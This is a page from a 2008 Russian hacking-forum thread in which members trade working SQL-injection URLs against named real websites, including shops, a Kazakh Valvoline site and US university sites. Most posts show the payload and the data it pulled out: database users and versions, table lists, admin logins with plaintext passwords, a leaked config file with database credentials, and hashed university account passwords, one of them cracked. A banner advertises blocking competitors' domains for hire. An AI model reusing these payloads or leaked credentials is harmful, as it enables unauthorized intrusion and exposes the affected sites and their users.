Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 592 из 1242

592

Опции темы

Поиск в этой теме

Опции просмотра

#5911

07.07.2008, 21:10

SUBJECT617

Познающий

Регистрация: 06.08.2007

Сообщений: 85

Провел на форуме:
1695462

Репутация: 91

Отправить сообщение для SUBJECT617 с помощью ICQ

PR 3

Цитата:

http://www.menunsk.ru/places.php?id=0)+union+select+table_name,2+from+in formation_schema.tables/*

#5912

07.07.2008, 22:10

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.business.su/kat.php?goroda=-104+union+select+concat_ws(0x3a,version(),user(),d atabase())/*

Version:4.0.27-standard
User:business_locuser@localhost
Database:business_mbase

таблички к сожалению не подобрал

2 gangs сюда постим только раскрученные скули...

#5913

07.07.2008, 22:22

-Hormold-

Постоянный

Регистрация: 29.09.2007

Сообщений: 617

Провел на форуме:
3250478

Репутация: 999

Отправить сообщение для -Hormold- с помощью ICQ

Может боян...
http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,user(),5,6/*
http://www.geninform.ru/index.php?category_id=-75+union+select+user()/*

#5914

08.07.2008, 01:54

DDoSька

Постоянный

Регистрация: 05.05.2008

Сообщений: 403

Провел на форуме:
2375039

Репутация: 1160

Отправить сообщение для DDoSька с помощью ICQ

http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,5,6,table_name+from+inform ation_schema.tables+limit+25,1/*
Тут много чего мона наделать =))
---------------------------------------------
www.volnorez.ru/forum/admin/index.php
админ: egor
пасс : 32167q

Последний раз редактировалось DDoSька; 08.07.2008 в 03:16..

#5915

08.07.2008, 04:33

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

DDoSька, -Hormold-

Цитата:

<?php
define('DB_SERVER', 'u24244.mysql.masterhost.ru');
define('DB_SERVER_USERNAME', 'u24244');
define('DB_SERVER_PASSWORD', 'symentico3go');
define('DB_DATABASE', 'u24244');

/forum/images/vital.php

Последний раз редактировалось sabe; 08.07.2008 в 04:41..

#5916

08.07.2008, 04:48

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Код:

http://www.basketshop.ru/showitem.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,login,pass),18,19,20,21,22,23,24,25+from+gbusers+limit+0,1/*

version() 4.1.22
user() basketsh@localhost
database() wwwbasketshopru

#5917

08.07.2008, 06:33

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

www.valvoline.kz

Цитата:

http://www.valvoline.kz/index.php?news&news=9+order+by+6

и так ... колонок 6 ...

Цитата:

http://www.valvoline.kz/index.php?news&news=-9+union+select+1,version(),3,4,5,6/*

Ver : 5.0.26

Перегребаем информейшн_табля и находим только одну интересную таблицу... admin в бд valvoline

Цитата:

http://www.valvoline.kz/index.php?news&news=-9+union+select+1,concat(login,char(58),password),3 ,4,5,6+from+valvoline.admin/*

login: admin
pass: library

.....

Админка:

_http://www.valvoline.kz/admin.php
_http://www.valtec.kz/admin.php

#5918

08.07.2008, 14:11

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

ничего толкового выжать не удалось..мож кто наколупает что..))
EDU

Цитата:

http://inquiry.uiuc.edu/cil2/syllabus_printer_friendly.php?syllabus_id=39+union +select+concat_ws(char(58),user(),version(),databa se())/*

cillookup@gserve085.lis.uiuc.edu:5.0.15:cilbuilder

next..

Цитата:

http://www.ans.iastate.edu/events/calendar_print.php?month=9&year=2007&room=1+order+ by+4/*

PHP код:


		
			
aswipe_user

NetID:Password    pluthe:2a8de84d9bba07bd167538242df1a3c6 plspike:01e1a02dc87a642ef3b6d00cbee39e91  dlnelson:a1f1d2a50abcb2421fee7d509810e153  sebranek:69e332ddfc7042b084a6367ad89b0259  jdickson:9f88e2f040d048435afc7c91ead6c257  hkepler:cb16f5d9fecbae34d999a17652305de1  amkrull:1c06f99ef5c5fcaa140cfb1a363b670d  ashuey:0c1e3901334db2be084c9a20ed7dcce2  trina:c89f9f4ef264e22001f9a9c3d72992ef  jrober:c69606c5207571c525520256ada5250d  jaiton:dfd8f130b46332c4ff46c8316ad2465d

pluthe:2a8de84d9bba07bd167538242df1a3c6:fricfrac

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Цитата:

http://news.lib.vt.edu/libnews/modules.php?name=News&file=print&sid=2+union+selec t+user,2,password,4,5,6+from+mysql.user+limit+0,10/*

Цитата:

staff:4A8210F69BBF5F82B9392F9305960AC5229829B3: root:8093D3180B1D12DFF9E3618B4C6770CB5C6BA312:

Последний раз редактировалось $n@ke; 08.07.2008 в 16:26.. Причина: add..again)

#5919

09.07.2008, 04:06

Lexeon

Участник форума

Регистрация: 16.11.2006

Сообщений: 100

Провел на форуме:
226029

Репутация: 3

Интернет магазин
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+table_name +from+information_schema.tables+limit+20,1/*
НО... Не могу понять почему не работает ничего при запросе
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( username,password)+from+users/*

#5920

09.07.2008, 06:10

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

_http://www.a-training.ru/news/new.php?id=15+union+select+1,2,3/*
version() - 4.0.27-log
database() - a-training
user() - a-training@localhost

_http://www.latfutsal.lv/new.php?id=-489+union+select+1,2,3,4,5,6,7,8/*
version() - 4.0.27-l
database() - new
user() - new@loca

_http://www.bukovina.biz.ua/new.php?id=-14+union+select+1,2,3,4,5/*

_http://www.creacon.ru/new.php?id=-245+union+select+1,2,3,4,5/*

_http://www.adams-motors.ru/new.php?id=-2+union+select+1,2,3/*
version() - 5.0.32-Debian_7etch5-log
database() - adamsold
user() - adamsold@localhost

_http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,2%20FROM%20INFORMATION _SCHEMA.TABLES%20/*
имена таблиц :

Цитата:

CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
phpbb_auth_access
phpbb_banlist
phpbb_categories и т.д.

Страница 592 из 1242

592

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход